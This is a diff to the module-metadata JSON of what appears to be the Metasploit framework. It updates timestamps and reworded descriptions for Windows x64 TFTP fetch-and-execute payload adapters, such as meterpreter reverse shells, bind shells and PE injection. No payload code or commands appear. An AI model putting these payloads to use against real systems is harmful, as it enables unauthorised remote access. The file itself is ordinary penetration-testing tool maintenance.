@@ -221391,7 +225052,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid",
|
||||
@@ -221424,7 +225085,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221435,7 +225096,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_http",
|
||||
@@ -221471,7 +225132,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221482,7 +225143,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_https",
|
||||
@@ -221515,7 +225176,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221526,7 +225187,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_named_pipe",
|
||||
@@ -221559,7 +225220,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221570,7 +225231,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp",
|
||||
@@ -221607,7 +225268,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221618,7 +225279,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4",
|
||||
@@ -221651,7 +225312,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221662,7 +225323,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid",
|
||||
@@ -221695,7 +225356,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221706,7 +225367,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttp",
|
||||
@@ -221739,7 +225400,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221750,7 +225411,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttps",
|
||||
@@ -221783,7 +225444,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221794,7 +225455,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_bind_named_pipe",
|
||||
@@ -221824,7 +225485,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221835,7 +225496,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_bind_tcp",
|
||||
@@ -221865,7 +225526,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221876,7 +225537,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_http",
|
||||
@@ -221906,7 +225567,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221917,7 +225578,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_https",
|
||||
@@ -221947,7 +225608,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221958,7 +225619,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp",
|
||||
@@ -221988,7 +225649,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -221999,7 +225660,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_tcp",
|
||||
@@ -222029,7 +225690,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222039,7 +225700,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp",
|
||||
@@ -222072,7 +225733,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222082,7 +225743,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
@@ -222114,7 +225775,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222124,7 +225785,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_named_pipe",
|
||||
@@ -222156,7 +225817,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222166,7 +225827,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp",
|
||||
@@ -222203,7 +225864,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222213,7 +225874,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_rc4",
|
||||
@@ -222246,7 +225907,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222256,7 +225917,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_uuid",
|
||||
@@ -222288,7 +225949,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222298,7 +225959,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/reverse_named_pipe",
|
||||
@@ -222330,7 +225991,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222340,7 +226001,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp",
|
||||
@@ -222377,7 +226038,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222387,7 +226048,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_rc4",
|
||||
@@ -222420,7 +226081,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -222430,7 +226091,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_uuid",
|
||||
@@ -222461,7 +226122,7 @@
|
||||
"Brendan Watters",
|
||||
"bwatters-r7"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222471,7 +226132,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/pingback_reverse_tcp",
|
||||
@@ -222502,7 +226163,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -222512,7 +226173,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/powershell_bind_tcp",
|
||||
@@ -222543,7 +226204,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -222553,7 +226214,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp",
|
||||
@@ -222584,7 +226245,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -222594,7 +226255,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp_ssl",
|
||||
@@ -222623,7 +226284,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222633,7 +226294,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp",
|
||||
@@ -222665,7 +226326,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222675,7 +226336,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid",
|
||||
@@ -222707,7 +226368,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222717,7 +226378,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/tftp/x64/shell/bind_named_pipe",
|
||||
@@ -222748,7 +226409,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -222758,7 +226419,7 @@
|
||||
